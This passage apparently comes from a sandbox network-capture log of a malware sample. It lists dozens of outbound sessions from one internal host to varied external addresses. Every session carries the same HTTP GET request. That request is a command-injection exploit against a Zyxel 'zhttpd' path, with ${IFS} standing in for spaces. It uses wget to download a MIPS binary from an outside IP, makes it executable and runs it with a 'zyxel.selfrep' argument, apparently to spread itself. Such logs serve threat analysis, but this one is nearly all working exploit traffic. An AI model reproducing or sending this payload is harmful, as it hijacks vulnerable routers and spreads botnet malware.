                                      Jan 19, 2024 17:29:42.979842901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6839192.168.2.1438806177.122.172.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979880095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6840192.168.2.1458382104.63.192.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979924917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6841192.168.2.1438186106.228.241.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.979962111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6842192.168.2.144867852.177.49.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980017900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6843192.168.2.1440158120.81.45.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980055094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6844192.168.2.1457784119.97.86.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980093956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6845192.168.2.1440766165.205.174.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980144024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6846192.168.2.143566682.206.11.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980185032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6847192.168.2.144843849.236.22.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980192900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6848192.168.2.1442670165.162.195.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980232954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6849192.168.2.1449316223.230.181.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980278969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6850192.168.2.1433002163.250.52.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980303049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6851192.168.2.145177441.191.202.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980379105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6852192.168.2.144739065.217.193.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980391979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6853192.168.2.1449632101.123.235.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980446100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6854192.168.2.1444972150.107.162.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980484009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6855192.168.2.143345818.26.85.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980547905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6856192.168.2.145792696.4.66.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980587959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6857192.168.2.1448202223.14.156.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980618954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6858192.168.2.1435664123.126.217.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980650902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6859192.168.2.145574053.6.84.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980683088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6860192.168.2.1453050126.0.236.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980719090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6861192.168.2.144421670.216.76.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980750084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6862192.168.2.143823469.191.21.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980803967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6863192.168.2.1443308202.8.10.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980863094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6864192.168.2.1443662128.69.5.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980904102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6865192.168.2.145739651.216.250.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980937004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6866192.168.2.1441000124.68.2.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.980982065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6867192.168.2.143576287.207.106.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981035948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6868192.168.2.1444592209.232.250.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981045008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6869192.168.2.144812275.2.229.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981108904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6870192.168.2.1444996112.232.190.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981139898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6871192.168.2.145227890.155.0.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981190920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6872192.168.2.1443328216.115.56.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981240988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6873192.168.2.143598040.73.211.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981272936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6874192.168.2.144110219.192.71.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981311083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6875192.168.2.1451028143.38.135.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981368065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6876192.168.2.1446278129.155.65.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981416941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6877192.168.2.143302275.101.254.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981450081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6878192.168.2.1441048150.193.86.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981488943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6879192.168.2.1450498145.232.79.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981523037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6880192.168.2.144148287.75.30.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981555939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6881192.168.2.144274892.34.244.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981614113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6882192.168.2.144622677.83.50.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981667995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6883192.168.2.143473872.45.204.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981694937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6884192.168.2.143561278.221.82.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981751919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6885192.168.2.1460098196.103.162.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981795073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6886192.168.2.1435088146.155.143.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981825113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6887192.168.2.145161868.169.39.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981868982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6888192.168.2.143868277.121.60.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981923103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6889192.168.2.144866887.123.155.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981962919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6890192.168.2.1456856177.132.176.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.981996059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6891192.168.2.1458808172.243.155.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982032061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6892192.168.2.1442696140.183.50.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982053995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6893192.168.2.1448994108.44.81.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982089996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6894192.168.2.1445968123.192.46.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982120037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6895192.168.2.1448972128.156.241.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982150078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6896192.168.2.145513240.149.128.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982189894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6897192.168.2.1457938118.216.84.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982239008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6898192.168.2.1459382154.99.201.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982280970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6899192.168.2.145808080.161.3.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982320070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6900192.168.2.1447036185.165.38.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982345104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6901192.168.2.1446172153.63.125.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.982382059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6902192.168.2.144674493.71.62.18443
                                      TimestampBytes transferredDirectionData
